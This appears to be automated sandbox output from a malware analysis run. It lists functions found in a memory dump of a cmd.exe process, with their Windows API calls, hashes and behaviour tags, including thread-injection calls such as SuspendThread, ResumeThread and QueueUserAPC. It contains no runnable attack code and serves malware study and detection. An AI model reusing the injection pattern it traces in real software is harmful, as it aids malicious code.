Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
String ID:
API String ID: 417118235-0
Opcode ID: 4ec3ddba234cb93ab8b7d9ab992f453fd4db67833ea2fbef36f8c7d0b664d9cc
Instruction ID: a6664e87c01729173bcd2424e6748d2825394a166ebf6bdf96b988dcee643bc9
Opcode Fuzzy Hash: 4ec3ddba234cb93ab8b7d9ab992f453fd4db67833ea2fbef36f8c7d0b664d9cc
Instruction Fuzzy Hash: 2B11C871102719FFD760AF94DC48FABB7A8FF00755F441020F90496184C7BAE990CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0304F92A, Relevance: 10.6, APIs: 7, Instructions: 59sleepsynchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(030317CA,?,0304330E), ref: 0304F93F

Part of subcall function 03031D99: InterlockedExchange.KERNEL32(?,000000FF), ref: 03031DA0

WaitForSingleObject.KERNEL32(?,000000FF,?,?,0304330E), ref: 0304F95F
RtlEnterCriticalSection.NTDLL(?), ref: 0304F97A
RtlLeaveCriticalSection.NTDLL(?), ref: 0304F992
Sleep.KERNEL32(000001F4), ref: 0304F9A1
LocalFree.KERNEL32(?), ref: 0304F9B9
RtlDeleteCriticalSection.NTDLL(?), ref: 0304F9C3

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: CriticalSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
String ID:
API String ID: 3004309391-0
Opcode ID: d71286896127d03fa71c26d19a31693b9ec5f7b912c7da3cc784cc800e29d8c1
Instruction ID: 206317f4f74e5866d3c34453390267efd2e752a1ec92b5b964fb98c8dfa3a18d
Opcode Fuzzy Hash: d71286896127d03fa71c26d19a31693b9ec5f7b912c7da3cc784cc800e29d8c1
Instruction Fuzzy Hash: 59114CB610271AABDBA0BB65DC4896BB7FCFF447153482928E58293414CB3AF9448B10

Uniqueness

Uniqueness Score: -1.00%

Function 03037B5D, Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 030463A7: RtlAllocateHeap.NTDLL(00000000,00000001,030318D4), ref: 030463B3

GetLastError.KERNEL32(?,?,?,00001000), ref: 03037BDE
WaitForSingleObject.KERNEL32(00000000,00000000,?,?), ref: 03037C63
CloseHandle.KERNEL32(00000000), ref: 03037C7D
OpenProcess.KERNEL32(00100000,00000000,00000000,?,?), ref: 03037CB2

Part of subcall function 03046E8E: RtlReAllocateHeap.NTDLL(00000000,?,?,03037C21), ref: 03046E9E

WaitForSingleObject.KERNEL32(?,00000064), ref: 03037D34
CloseHandle.KERNEL32(?), ref: 03037D5B

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
String ID:
API String ID: 3115907006-0
Opcode ID: 773ff0df9f16017f3d75fbb05844219bd5b479f2d2887bbeadb15caa33926bd4
Instruction ID: c95aa6b171c1a2445cd23b29c7008a70a3f7abb7e3796378157f569836dda9f2
Opcode Fuzzy Hash: 773ff0df9f16017f3d75fbb05844219bd5b479f2d2887bbeadb15caa33926bd4
Instruction Fuzzy Hash: CB8137B5D02219EFCF50DF98C884AAEFBF9FF09B01F148459E905AB251D731A940CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03042AEC, Relevance: 9.1, APIs: 6, Instructions: 125threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03042B0F

Part of subcall function 0304F5F1: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,?,?,0304E52B,00000000,00000000,00000000,00000000,?,0305C1E4,03037294,0305C1E4), ref: 0304F60C
Part of subcall function 0304F5F1: IsWow64Process.KERNEL32(?,00000000,?,00000000,?,?,0304E52B,00000000,00000000,00000000,00000000,?,0305C1E4,03037294,0305C1E4,00000000), ref: 0304F61D
Part of subcall function 0304F5F1: FindCloseChangeNotification.KERNELBASE(?,?,?,0304E52B,00000000,00000000,00000000,00000000,?,0305C1E4,03037294,0305C1E4,00000000,?,?,03044958), ref: 0304F630

ResumeThread.KERNEL32(00000001,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,03056168,00000000), ref: 03042BC9
WaitForSingleObject.KERNEL32(00000064), ref: 03042BD7
SuspendThread.KERNEL32(00000001), ref: 03042BEA

Part of subcall function 0304B38D: memset.NTDLL ref: 0304B64E

ResumeThread.KERNEL32(00000001), ref: 03042C6D

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Thread$ProcessResumememset$ChangeCloseFindNotificationObjectOpenSingleSuspendWaitWow64
String ID:
API String ID: 2336522172-0
Opcode ID: 96d3cda837edac33dbcbe8f3e3bf44af02658a54633b3fd6980ca7e10ccc7e93
Instruction ID: cc740878a2b968ad19a8f0c3481786b3a09026ad6f3587c054e03902ee59a3e4
Opcode Fuzzy Hash: 96d3cda837edac33dbcbe8f3e3bf44af02658a54633b3fd6980ca7e10ccc7e93
Instruction Fuzzy Hash: D0417CB2602309ABDB61EFA4CC84AEEBBBDAF44350F188875F915A6150D736DB50CB50

Uniqueness

Uniqueness Score: -1.00%

Function 030431D3, Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44bec2f05415411ea26f8dea63e08ee5dc80f67062d8539e9a796e96bffb5503
Instruction ID: 0d20037f85ff6a6b71f4d5f94eb31c728443fa8f3cfd77648f66f0833d5a88b4
Opcode Fuzzy Hash: 44bec2f05415411ea26f8dea63e08ee5dc80f67062d8539e9a796e96bffb5503
Instruction Fuzzy Hash: 1F4128F5502705AFD720EF29CC8992BBBF8FB84360B141A7DF1A6C6180EB319510CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0303DABD, Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(03041BE7,?,?,00000402,03041BE7,03058570,00000018,0303F244,?,00000402,0305B7A4,0305B7A0,-0000000C,00000000), ref: 0303DB00
VirtualProtect.KERNEL32(00000000,00000004,03041BE7,03041BE7,00000000,00000004,03041BE7,0305B7A4,03041BE7,?,?,00000402,03041BE7,03058570,00000018,0303F244), ref: 0303DB8B
RtlEnterCriticalSection.NTDLL(0305C300), ref: 0303DBB3
RtlLeaveCriticalSection.NTDLL(0305C300), ref: 0303DBD1

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
String ID:
API String ID: 3666628472-0
Opcode ID: 0acb6a5ad885819ac5caf0d83a0fd1c8d83060354a5c37a8cad48279cb29877e
Instruction ID: 46d17151f3abe2537e209fae085b025d01d56d2847a77402ea00188252a398e0
Opcode Fuzzy Hash: 0acb6a5ad885819ac5caf0d83a0fd1c8d83060354a5c37a8cad48279cb29877e
Instruction Fuzzy Hash: B04180B5902709EFDB11EF65C88499EFBF8FF49300B14892AE915EB210D7759940CF90

Uniqueness

Uniqueness Score: -1.00%

Function 03036032, Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON

Download Yara Rule

APIs

OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0303604C
CreateWaitableTimerA.KERNEL32(0305C1A8,?,?), ref: 03036069
GetLastError.KERNEL32(?,?), ref: 0303607A

Part of subcall function 0303B84E: RtlAllocateHeap.NTDLL(00000000,?), ref: 0303B89A
Part of subcall function 0303B84E: RegCloseKey.KERNELBASE(00000000,?,0304ED32,00000000,0304BD19,00000000,00000001,00000000,0305603C,?,?,?,0304BD19,00000000), ref: 0303B8DE

GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 030360BA
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 030360D9
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 030360EF

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: TimerWaitable$HeapTime$AllocateCloseCreateErrorFileFreeLastOpenSystem
String ID:
API String ID: 3073001550-0
Opcode ID: 20498247feaf1ec7f32326644e036f74f39de8016ddd23b82dcedb22836390e1
Instruction ID: 89f31fa655f114709ce9e849b9760fc899a67a8c5c282bfa2b0bdc7f5ca8827b
Opcode Fuzzy Hash: 20498247feaf1ec7f32326644e036f74f39de8016ddd23b82dcedb22836390e1
Instruction Fuzzy Hash: A931587190220DFBCB20EF99C8CACEFBFBDEB86741B588455E545E6101D7369A40CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03042392, Relevance: 9.1, APIs: 6, Instructions: 72filetimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,030448E5,00000000,030560DC,03051D54,?,00000001), ref: 0304239E
_aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 030423B4
CreateFileMappingW.KERNEL32(000000FF,0305C1A8,00000004,00000000,00001000,?), ref: 030423F5
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 0304241E
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 0304243F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 03042447

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: File$Time$CloseCreateErrorHandleLastMappingSystemView_aulldiv
String ID:
API String ID: 1732207917-0
Opcode ID: 41a3aa1aa8fe55e0bc316bd1e0b0506ada82fa31bd6ef4a77bba92d90ed76529
Instruction ID: 9166c7531c2753fb34de4e631bcf664773527200b8abf800fb7b52eace6b337a
Opcode Fuzzy Hash: 41a3aa1aa8fe55e0bc316bd1e0b0506ada82fa31bd6ef4a77bba92d90ed76529
Instruction Fuzzy Hash: 3E21D1B2702308BBD750EB68DC05F8F77ADAB84750F244121FA01EB194DB7096018B60

Uniqueness

Uniqueness Score: -1.00%

Function 030387C4, Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(-66AC8FD3,00000000,?), ref: 030387EC
_strupr.NTDLL ref: 03038827
lstrlen.KERNEL32(00000000), ref: 0303882F
TerminateProcess.KERNEL32(00000000,00000000,?,00000000,?), ref: 0303886E
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 03038875
GetLastError.KERNEL32 ref: 0303887D

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
String ID:
API String ID: 110452925-0
Opcode ID: 27ea79a92e8160532960fb30afd63d3731763220bc3c42dc5eb2498dd4d70819
Instruction ID: 2940fc13f74f727cece3d142de4407f031f5930c45d76a62ab8a2e09d46dd77c
Opcode Fuzzy Hash: 27ea79a92e8160532960fb30afd63d3731763220bc3c42dc5eb2498dd4d70819
Instruction Fuzzy Hash: 6D110173102308EFEB50BBB0DC88DAF77BCEB8A724B545865F906C2044EB39C5488B20

Uniqueness

Uniqueness Score: -1.00%

Function 0303CBE3, Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,00000000,00000000,?,?,0304EC57,030439D7,00000057,00000000), ref: 0303CBF9
RtlAllocateHeap.NTDLL(00000000,00000009,00000001), ref: 0303CC0C
lstrcpy.KERNEL32(00000008,?), ref: 0303CC2E
GetLastError.KERNEL32(0304CDCF,00000000,00000000,?,?,0304EC57,030439D7,00000057,00000000), ref: 0303CC57
HeapFree.KERNEL32(00000000,00000000,?,?,0304EC57,030439D7,00000057,00000000), ref: 0303CC6F
CloseHandle.KERNEL32(00000000,0304CDCF,00000000,00000000,?,?,0304EC57,030439D7,00000057,00000000), ref: 0303CC78

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
String ID:
API String ID: 2860611006-0
Opcode ID: c5c408d869600529c50e8af111e45bcd4649fddd03a66266f803e0a5b37ef7c5
Instruction ID: e70e7d012c7284d3dbb2097b5f1afd14213af813bff66ae659d0a6fee2c78692
Opcode Fuzzy Hash: c5c408d869600529c50e8af111e45bcd4649fddd03a66266f803e0a5b37ef7c5
Instruction Fuzzy Hash: B2119072502309EFEB50EFA9D8888AFBBBCFB063617044529F456D3240D7399D40CB60

Uniqueness

Uniqueness Score: -1.00%

Function 030527B2, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,00000000,?,00000000,030362B9), ref: 030527C9
QueueUserAPC.KERNEL32(?,00000000,0304BD43,?,?,0304BD43,00000000,00000000,?,?,00000000,03051CF9), ref: 030527DE
GetLastError.KERNEL32(00000000,?,?,0304BD43,00000000,00000000,?,?,00000000,03051CF9), ref: 030527E9
TerminateThread.KERNEL32(00000000,00000000,?,?,0304BD43,00000000,00000000,?,?,00000000,03051CF9), ref: 030527F3
CloseHandle.KERNEL32(00000000,?,?,0304BD43,00000000,00000000,?,?,00000000,03051CF9), ref: 030527FA
SetLastError.KERNEL32(00000000,?,?,0304BD43,00000000,00000000,?,?,00000000,03051CF9), ref: 03052803

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: aa2e591ee7bdb6639188449894d12071b3c661d35792d2ae0dbef8c19f1a6ddf
Instruction ID: 1ca13b239cba78dc84592701daa30aad0a759428365aab68184b1a3d5f6021a3
Opcode Fuzzy Hash: aa2e591ee7bdb6639188449894d12071b3c661d35792d2ae0dbef8c19f1a6ddf
Instruction Fuzzy Hash: 19F08233603324ABD7617BA4AC4CF6FBEA8FF08752F442814FB4690144C72B88108B95

Uniqueness

Uniqueness Score: -1.00%

Function 0304336B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 030433C6
SetLastError.KERNEL32(00000000,?,?,?), ref: 0304341A

Strings

vids, xrefs: 03043425

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ErrorLastmemset
String ID: vids
API String ID: 3276359510-3767230166
Opcode ID: 95251ef956c3b96a8736a3bb5e38690e232a3630e82ed9a918fb40f7bdc29b28
Instruction ID: c9c6bc457d8e7688c0c0d6a36e1513da110758d4b34b2d4807f3189820d9d64c
Opcode Fuzzy Hash: 95251ef956c3b96a8736a3bb5e38690e232a3630e82ed9a918fb40f7bdc29b28
Instruction Fuzzy Hash: 0B8128B5D122299FCF11DFA4D8849DEBBB9AF48710F1480AAF405EB250D7319A51CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0304AFF1, Relevance: 7.7, APIs: 6, Instructions: 163COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,0303AAC3,00000010,?,?,?,?,?,?,?,?,?,?,03042CF5,00000000,00000000), ref: 0304B042
memcpy.NTDLL(00000000,00000000,0303AAC3,0000011F), ref: 0304B0D5
GetLastError.KERNEL32(?,?,0000011F), ref: 0304B12D
GetLastError.KERNEL32 ref: 0304B15F
GetLastError.KERNEL32 ref: 0304B173
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,03042CF5,00000000,00000000,0303AAC3,0303422A,0303AAC3), ref: 0304B188

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ErrorLast$memcpy
String ID:
API String ID: 2760375183-0
Opcode ID: b39122ee07635a62276c3026bf7f8142f91cadc15b82d771406ca501611226ca
Instruction ID: 183df1cc982653dd2e68f803523b2a2a9a014a42058b1c34356d8db6bbc00546
Opcode Fuzzy Hash: b39122ee07635a62276c3026bf7f8142f91cadc15b82d771406ca501611226ca
Instruction Fuzzy Hash: 44514AB1901208FFEB10DFA9DC84AEFBBB8EB48350F148435F951E6250D7759A50CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0303F3F2, Relevance: 7.7, APIs: 5, Instructions: 155registryfilememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03036D31: RegCloseKey.ADVAPI32(?,0304CD34), ref: 03036DB8

RegCloseKey.ADVAPI32(0304CD34,?,0304CD34,00000000,?,?,?,0304CD34), ref: 0303F561

Part of subcall function 03053345: lstrlenW.KERNEL32(?,00000000,00000000,0305603C,?,?,0303874D,?,0305603C), ref: 03053351
Part of subcall function 03053345: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,0303874D,?,0305603C), ref: 03053379
Part of subcall function 03053345: memset.NTDLL ref: 0305338B

Part of subcall function 03046E2C: lstrlenW.KERNEL32(00000000,00000000,?,0303F516,00000000,?,?,?,0304CD34), ref: 03046E3F
Part of subcall function 03046E2C: lstrlen.KERNEL32(0303F516,?,0303F516,00000000,?,?,?,0304CD34), ref: 03046E4A
Part of subcall function 03046E2C: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 03046E5F

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,0304CD34), ref: 0303F596
GetLastError.KERNEL32(?,?,0304CD34), ref: 0303F5A1
HeapFree.KERNEL32(00000000,00000000,?,?,0304CD34), ref: 0303F5B7
RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,?,?,0304CD34), ref: 0303F5C9

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Closelstrlen$Heap$AllocateCreateErrorFileFreeLastmemcpymemset
String ID:
API String ID: 3434821807-0
Opcode ID: 1f35d226b16c296b729a6c28029b5b3785d11186d31b72a77058922fba8b4c2f
Instruction ID: 4ca87dec9455f03b38f0add54728b0fc75bc6d46bb36210d33210bcce0ab06dc
Opcode Fuzzy Hash: 1f35d226b16c296b729a6c28029b5b3785d11186d31b72a77058922fba8b4c2f
Instruction Fuzzy Hash: 36516B7690230AABDB11EFA4DC44EEF7BBDEF46344B140566EA01E7124DB39DA01CB64

Uniqueness

Uniqueness Score: -1.00%

Function 03040077, Relevance: 7.6, APIs: 5, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,03056065,?), ref: 03040117
memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,0303762E,?,?,?,?,?), ref: 0304012E
HeapFree.KERNEL32(00000000,00000000), ref: 03040141
memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,0303762E,?,?,?,?,?), ref: 03040150
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,00000001,00000001,?,0303762E,?,?,?), ref: 030401B4

Part of subcall function 03051412: RtlLeaveCriticalSection.NTDLL(?), ref: 0305148F

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Heap$Freememcpy$AllocateCriticalLeaveSection
String ID:
API String ID: 1878246414-0
Opcode ID: 13f31fd45043437b523647fc2b5fe18778a3ce4e86bdc324b5d0262c53b526d5
Instruction ID: bf21a3c8ea7e5a61835d06a35f98ef66227308f2cd8e1e1587137a2a29282457
Opcode Fuzzy Hash: 13f31fd45043437b523647fc2b5fe18778a3ce4e86bdc324b5d0262c53b526d5
Instruction Fuzzy Hash: 63418EB1902319FFCB22EFA8CC44BAFBBB5EF04350F154475EA05AA160C7759A50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 03038924, Relevance: 7.6, APIs: 5, Instructions: 123memoryregistrysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 03038E53: RegCreateKeyA.ADVAPI32(80000001,0305C0D4,?), ref: 03038E68
Part of subcall function 03038E53: lstrlen.KERNEL32(0305C0D4,00000000,00000000,00000000,?,0303B86A,00000000,00000000,00000001,0305603C,0304BD19,0304BD19,?,0304ED32,00000000,0304BD19), ref: 03038E91

HeapFree.KERNEL32(00000000,?,?,00000000,03044995,00000000,030560DC,03051D54,?,00000001), ref: 030389E3
WaitForSingleObject.KERNEL32(00000000,?,00000000,03044995,00000000,030560DC,03051D54,?,00000001), ref: 03038A49
HeapFree.KERNEL32(00000000,?,?,00000000,03044995,00000000,030560DC,03051D54,?,00000001), ref: 03038A72
HeapFree.KERNEL32(00000000,03044995,?,00000000,03044995,00000000,030560DC,03051D54,?,00000001), ref: 03038A82
RegCloseKey.ADVAPI32(00000000,?,00000000,03044995,00000000,030560DC,03051D54,?,00000001), ref: 03038A8B

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: FreeHeap$CloseCreateObjectSingleWaitlstrlen
String ID:
API String ID: 2002143150-0
Opcode ID: 73c623d3836353eeb9903967d1c8601e284a76843c45de6aa8389cf31df68e2d
Instruction ID: fbe0b6a89a0b4e3cdf875bedb3191949d6f73c548ef8b6d5ec782a0034ad2876
Opcode Fuzzy Hash: 73c623d3836353eeb9903967d1c8601e284a76843c45de6aa8389cf31df68e2d
Instruction Fuzzy Hash: B641C2B5C0220AEFDF11DFD5D8848EEBBBDFB09244F5484AAF510A2214D7359A98DF60

Uniqueness

Uniqueness Score: -1.00%

Function 030312B4, Relevance: 7.6, APIs: 5, Instructions: 110memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0303FC76: GetCurrentThreadId.KERNEL32 ref: 0303FCAE
Part of subcall function 0303FC76: GetSystemTimeAsFileTime.KERNEL32(0304B2AE,?,?,?,0304C810,00000929,00000000,?,?,0303D87C,00000000,00000000,?,0000000E), ref: 0303FCBA
Part of subcall function 0303FC76: GetTempFileNameA.KERNEL32(00000000,00000000,0304B2AE,00000000,?,?,?,0304C810,00000929,00000000,?,?,0303D87C,00000000,00000000,?), ref: 0303FCC8
Part of subcall function 0303FC76: lstrcpy.KERNEL32(00000000), ref: 0303FCEA

StrChrA.SHLWAPI(?,0000002C,00003219), ref: 030312FA
HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 030313A2
DeleteFileA.KERNEL32(?,00003219), ref: 030313C4
HeapFree.KERNEL32(00000000,?), ref: 030313D3
HeapFree.KERNEL32(00000000,?,00003219), ref: 030313EB

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: FileFreeHeap$Time$CurrentDeleteNameSystemTempThreadlstrcpy
String ID:
API String ID: 1454751375-0
Opcode ID: 4a1deda984ad3379a76c53c706a123b78c4e0d932a164d0578f41a5996494846
Instruction ID: 324dd5eea61b12206c10712a01482158b5b09b8b9648c3b2854855285c51faea
Opcode Fuzzy Hash: 4a1deda984ad3379a76c53c706a123b78c4e0d932a164d0578f41a5996494846
Instruction Fuzzy Hash: 4031B132106309AFE710FB58EC04FAB77ECEF4AB04F080515F644D7144DB69E9068BAA

Uniqueness

Uniqueness Score: -1.00%

Function 030382A6, Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 030456F2: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 030456FE
Part of subcall function 030456F2: SetLastError.KERNEL32(000000B7,?,030382BA), ref: 0304570F

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 030382DA
CloseHandle.KERNEL32(00000000), ref: 030383B2

Part of subcall function 03036032: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0303604C
Part of subcall function 03036032: CreateWaitableTimerA.KERNEL32(0305C1A8,?,?), ref: 03036069
Part of subcall function 03036032: GetLastError.KERNEL32(?,?), ref: 0303607A
Part of subcall function 03036032: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 030360BA
Part of subcall function 03036032: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 030360D9
Part of subcall function 03036032: HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 030360EF

GetLastError.KERNEL32 ref: 0303839B
ReleaseMutex.KERNEL32(00000000), ref: 030383A4

Part of subcall function 030456F2: CreateMutexA.KERNEL32(0305C1A8,00000000,?,?,030382BA), ref: 03045722

GetLastError.KERNEL32 ref: 030383BF

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
String ID:
API String ID: 1700416623-0
Opcode ID: 9a39ab5885fe8449bc40de95467cf5ea60f9822072847207e8a041a42c8761da
Instruction ID: a65cd8ae7d6acc64f035de93edea8dc06651cb69436cb414fc81b7e5c783bdd3
Opcode Fuzzy Hash: 9a39ab5885fe8449bc40de95467cf5ea60f9822072847207e8a041a42c8761da
Instruction Fuzzy Hash: 1C31B07A602308ABCB10EF79DC948AFBBFDEB863507284866F805D7354D7758800CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0304026C, Relevance: 7.6, APIs: 5, Instructions: 97memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000007), ref: 030402EE
lstrcpy.KERNEL32(00000000,?), ref: 03040307
lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 03040314
lstrlen.KERNEL32(0305D3A4,?,?,?,?,?,00000000,00000000,?), ref: 03040326
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 03040357

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
String ID:
API String ID: 2734445380-0
Opcode ID: c7c24e6f093c9ed200814e8804b0804dee07d9f25c186337d9654309e0ba1fb8
Instruction ID: cd98c38ec458900b26a673509d8973bab6c10f3f8a87cd4ba1dd2d914f300c01
Opcode Fuzzy Hash: c7c24e6f093c9ed200814e8804b0804dee07d9f25c186337d9654309e0ba1fb8
Instruction Fuzzy Hash: 7E315972501209FFDB21DF95DC48EEFBBA8FF45211F048524F91596200E775AA50CB60

Uniqueness

Uniqueness Score: -1.00%

Function 030371AB, Relevance: 7.6, APIs: 5, Instructions: 84sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0303D23A: memset.NTDLL ref: 0303D244

OpenEventA.KERNEL32(00000002,00000000,0305C1E4,?,00000000,00000000,?,03044958,?,?,?,?,030317CA,?,?,?), ref: 03037245
SetEvent.KERNEL32(00000000,?,03044958,?,?,?,?,030317CA,?,?,?,00000001,0305C1AC,00000000), ref: 03037252
Sleep.KERNEL32(00000BB8,?,03044958,?,?,?,?,030317CA,?,?,?,00000001,0305C1AC,00000000), ref: 0303725D
ResetEvent.KERNEL32(00000000,?,03044958,?,?,?,?,030317CA,?,?,?,00000001,0305C1AC,00000000), ref: 03037264
